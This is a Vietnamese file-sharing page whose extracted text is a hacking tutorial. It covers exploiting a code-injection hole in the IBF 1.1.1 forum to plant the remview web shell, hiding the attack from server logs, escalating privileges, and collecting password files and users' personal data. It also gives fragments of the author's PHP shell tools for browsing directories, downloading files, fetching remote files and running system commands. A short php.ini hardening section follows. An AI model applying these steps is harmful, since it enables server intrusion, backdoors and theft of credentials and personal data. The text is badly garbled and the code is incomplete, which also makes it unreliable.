Hack IBF 1

Hack IBF 1

Thể loại: An ninh Bảo mật
Lượt xem: 64,140Lượt tải: 4Số trang: 14

Mô tả tài liệu

Tham khảo tài liệu 'hack ibf 1', công nghệ thông tin, an ninh - bảo mật phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả

Tóm tắt nội dung

.Hack IBF 1.1.1 qua lỗi của file này đã được đọc lần đó bạn có thể xài remview qua địa để khai thác thành công lỗi này thì máy chủ phải cài forum ibf 1.1.1 chưa được patch lỗi code injection trong file php.ini : & nhân do file lỗi code injection trong file nội dung của file này như cái server nào chưa được patch lỗi này và cấu hình php cho đăng kí biến toàn cục + truy cập file remote thì chúng ta có thể khai thác đại loại như thể là nó dòng "require ... ;" trong file sẽ này sẽ thay đổi nội dung của file trên máy chủ và cài remview vào đây. ( bạn xem 2 file & sẽ rõ, file bị thay đổi một chút xíu cho phù hợp) - cho dù set quote đã được bật thì vẫn có thể khai thác được ở đây. hihi, bạn tham khảo của sẽ rõ! - mình chỉ lợi dụng một chỗ hở của forum IBF thôi. đây là một đoạn trong file hướng dẫn cài đặt "bạn phải chmod 777 cho thư mục uploads và file trước khi tiến hành cài đặt forum". quá tệ phải không? mình đã thử upload file lên thư mục uploads nhưng nó chỉ được set là uid&gid đang có hiệu lực hiện tại, cụ thể là khi safe mode đã được bật, nếu chạy thì nó chẳng chạy đâu do là khác với của thư mục hiện tại. vì vậy chỉ có thể kiếm cái file nào đó được chmod 777 mà xài thôi. mình chọn do file này default được set là 777 à lưu ý bạn chỉ nên chạy dòng MỘT LẦN DUY chạy chúng ta sẽ bị ghi nhất kí ngay. file .log của httpd như - GET tránh ghi nhật kí khi khai thác, bạn tạo một file html như IE, set lại proxy là và sau đó chạy file html vừa tạo. ok, nhật kí của httpd sẽ như - - POST sự thì họ chẳng biết địa chỉ ip của chúng ta và cũng chẳng biết được chúng ta đã cài bằng cách nào nữa - chúng ta tiếp tục với việc leo thang quyền. sau khi bạn upload file bạn có thể xài đồ nghề này để đi kiếm chát vài thứ khác. các file bạn cần để ý đến là .passwd, ... chúng ta sẽ thăm dò toàn bộ các file chứa username & password. bạn cũng nên thu thập thêm vài thông tin khác như địa chỉ email, thông tin cá nhân của các users mà bạn có thể truy cập đến trên server. một vấn đề nữa là bạn nên cố tìm trên server file .cgi, .pl gặp lỗi (thường nằm trong thư mục cgi-bin) hoặc các thư mục cgi mà chúng ta có thể upload file cgi. khi chế độ safemode đã được bật thì rất khó làm gì được. chúng ta nên chuyển sang xài cgi để hack dễ hơn. hihi, bạn cố gắng upload backdoor lên server để xài nha. - một số đồ nghề php mà mình đã code (để hổ trợ cho hack code injection thôi). uh, mình quên viết sql.php rồi - : dir tree, rất cần để tham dò toàn bộ cấu trúc của thư mục : xác định uid/gid đang có hiệu lực và lấy thông tin từ hàm - : liệt kê 1 thư mục cụ thể - : upload file qua url:// (http:// & ftp://) - : xem nộ dung của 1 file cụ thể trên máy chủ - : lấy file từ máy chủ về máy mình - : thực thi lệnh hệ thứ này các bạn nên code lại tuỳ theo hoàn cảnh cụ thể của bạn. riêng mình thì mình thích nhất là hai file tree.php & mà mình đã code * phòng thủ cho forum IBF của bạn (nói chung là cho PHP): - xoá ngay file trên server - chmod lại cho file là 755 - cấu hình lại file php.ini như // không có phép lấy file bằng passthru exec popen mail" // vô hiệu các hàm php nguy // không hiện lỗi php để đề phòng trường hợp tiết lộ thông tin về thư mục đang làm việc, dòng vấn tin sql gặp lỗi và một số thông tin khác // không cho phép upload file server (nếu bạn thấy không // bật // không tự động đăng kí biến toàn // bật chế độ an toàn cho // không cho thi hành lệnh hệ thống, bạn thay thành tên thư mục nào khác mà không chứa gì hết có gì hết và đã được set quyền an // bật chế độ an toàn so sánh gid/uid trước khi chạy kịch bản // bật chế độ an toàn trước khi vấn tin Support = disabled // vô hiệu các hàm liên quan đến socket nếu ban không bao giờ dùng đến. bạn nên tham khảo thêm tài liệu php về hai hàm & ini_set() Code các file trên tree.php - Code by vkdt as || as { while { if || elseif || else else && border=0 ($i=0; $i++) d/m/Y", else else && else ($i=0; $i++) d/m/Y", else else && else colspan=6 files ($i=0; $i++) return 2, ',', if return 2, ',', if return 2, ',', if return 2, ',', return 0, ',', { if (($p & 0xC000) === 0xC000) $type = 's'; else if (($p & 0x4000) === 0x4000) $type = 'd'; else if (($p & 0xA000) === 0xA000) $type = 'l'; else if (($p & 0x8000) === 0x8000) $type = '-'; else if (($p & 0x6000) === 0x6000) $type = 'b'; else if (($p & 0x2000) === 0x2000) $type = 'c'; else if (($p & 0x1000) === 0x1000) $type = 'p'; else = ($p & 00400) ? 'r' : = ($p & 00200) ? 'w' : = ($p & 00100) ? 'x' : = ($p & 00040) ? 'r' : = ($p & 00020) ? 'w' : = ($p & 00010) ? 'x' : = ($p & 00004) ? 'r' : = ($p & 00002) ? 'w' : = ($p & 00001) ? 'x' : & 0x800) $u["x"] = ($u["x"] == 'x') ? 's' : & 0x400) $g["x"] = ($g["x"] == 'x') ? 's' : & 0x200) $o["x"] = ($o["x"] == 'x') ? 't' : - Code by vkdt " . getcwd() . GID/UID: $uid/$gid (" . . "/" . . cmd.php -a; id; ps -aux; pwd; ls view.php exit; if "r")) get.php = => => => => => "bin dms lha lzh exe class so => => => "ai eps => "smi => => => => => => => => => => => "dcr dir => => => => => => "skp skd skt => => "nc => => => => => => => => => => "texinfo => "t tr => => => => => => => "au => "mid midi => "mpga mp2 => "aif aiff => => "ram => => => => => => => => => "jpeg jpg => => "tiff => => => => => => => => => => => "igs => "msh mesh => "wrl => => "html => "asc => => => "sgml => => => => => "xml => "mpeg mpg => "qt => => => => && ## Get MIME-type for = == = ", as == dir.php as || as =filesize { case else foreach ($dirs as $v) foreach ($links as $v) foreach ($files as $v) of border=1 ($names as $k=>$v) else 0, "", H:i:s", || else || else || else { if return return { if return return { if return ""; // xac dinh Type if( $mode & 0x1000 ) /* FIFO pipe */ else if( $mode & 0x2000 ) /* Character special */ else if( $mode & 0x4000 ) /* Directory */ else if( $mode & 0x6000 ) /* Block special */ else if( $mode & 0x8000 ) /* Regular */ else if( $mode & 0xA000 ) /* Symbolic Link */ else if( $mode & 0xC000 ) /* Socket */ else /* UNKNOWN */ // xac dinh = ($mode & 00400) ? 'r' : '-'; = ($mode & 00200) ? 'w' : '-'; = ($mode & 00100) ? 'x' : '-'; = ($mode & 00040) ? 'r' : '-'; = ($mode & 00020) ? 'w' : '-'; = ($mode & 00010) ? 'x' : '-'; = ($mode & 00004) ? 'r' : '-'; = ($mode & 00002) ? 'w' : '-'; = ($mode & 00001) ? 'x' : '-'; // hieu chinh SUID, SGID & bit $mode & 0x800 ) = ? 's' : 'S'; if( $mode & 0x400 ) = ? 's' : 'S'; if( $mode & 0x200 ) = ? 't' : 'T'; $type); return url.php && { if "wb")) { echo "a"; if "rb")) { while Unknown switch